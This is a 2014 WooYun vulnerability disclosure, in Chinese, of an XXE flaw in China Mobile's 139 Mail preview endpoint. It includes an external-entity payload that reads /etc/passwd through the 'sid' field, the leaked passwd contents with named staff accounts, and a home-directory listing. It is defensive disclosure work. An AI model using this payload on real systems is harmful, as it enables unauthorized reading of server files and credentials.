漏洞概要 关注数(24) 关注此漏洞
缺陷编号:wooyun-2014-074048
漏洞标题:139邮箱XXE漏洞可读取文件
相关厂商:10086.cn
漏洞作者: 路人甲
提交时间:2014-08-27 14:41
修复时间:2014-10-11 14:42
公开时间:2014-10-11 14:42
漏洞类型:设计缺陷/逻辑错误
危害等级:高
自评Rank:10
漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理
漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]
Tags标签: 无
漏洞详情
披露状态:
2014-08-27: 细节已通知厂商并且等待厂商处理中
2014-09-01: 厂商已经确认,细节仅向厂商公开
2014-09-11: 细节向核心白帽子及相关领域专家公开
2014-09-21: 细节向普通白帽子公开
2014-10-01: 细节向实习白帽子公开
2014-10-11: 细节向公众公开
简要描述:
139邮箱XXE漏洞可读取文件
详细说明:
/opes/preview.do 输入处理不当可以通过sid取回文件内容
<?xml version="1.0" encoding="UTF-8" standalone="no"?>
<!DOCTYPE ANY [
<!ENTITY all SYSTEM "file:///etc/passwd">
]>
...
<string name="sid">&all;</string>
...
漏洞证明:
/etc/passwd:
sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin
rpcuser:x:29:29:RPC Service User:/var/lib/nfs:/sbin/nologin
nfsnobody:x:4294967294:4294967294:Anonymous NFS User:/var/lib/nfs:/sbin/nologin
dbus:x:81:81:System message bus:/:/sbin/nologin
avahi:x:70:70:Avahi daemon:/:/sbin/nologin
haldaemon:x:68:68:HAL daemon:/:/sbin/nologin
avahi-autoipd:x:100:101:avahi-autoipd:/var/lib/avahi-autoipd:/sbin/nologin
apache:x:48:48:Apache:/var/www:/sbin/nologin
oprofile:x:16:16:Special user account to be used by OProfile:/home/oprofile:/sbin/nologin
xfs:x:43:43:X Font Server:/etc/X11/fs:/sbin/nologin
gdm:x:42:42::/var/gdm:/sbin/nologin
sabayon:x:86:86:Sabayon user:/home/sabayon:/sbin/nologin
mailattr:x:550:550::/home/mailattr:/bin/bash
oracle:x:551:551::/home/oracle:/bin/bash
opes:x:500:500::/home/opes:/bin/bash
richlogall:x:55561:55561::/home/richlogall:/sbin/nologin
laibin:x:55562:55562::/home/laibin:/bin/bash
zhougx:x:55563:55563::/home/zhougx:/bin/bash
liuyq:x:55564:55564::/home/liuyq:/bin/bash
huangmp:x:55565:55565::/home/huangmp:/bin/bash
wenjj:x:55566:55566::/home/wenjj:/bin/bash
tanlinzhi:x:55567:55567::/home/tanlinzhi:/bin/bash
/home/opes:
.bash_history
.bash_logout
.bash_profile
.bashrc
.emacs
.lesshst
.mozilla
.ssh
.viminfo
.Yozo_Office
.zshrc
logs
maila
nfsmailattachment
nfsmailattachment01
nfsmailattachment02
nfsmailattachment03
opesconfig
printerName.sh
RealTimeSave
Temp
tmp
tomcat
Yozo_FileConvertLog.txt
Yozo_Office
Yozo_Officelog.txt
修复方案:
要修复找永中
版权声明:转载请注明来源 路人甲@乌云
漏洞回应
厂商回应:
危害等级:高
漏洞Rank:14
确认时间:2014-09-01 09:37
厂商回复:
CNVD确认所述情况,已经转由CNCERT通报给中国移动集团公司处置,对于XXE漏洞,虽然不新鲜,但实例还是比较难发现,rank 14
最新状态:
暂无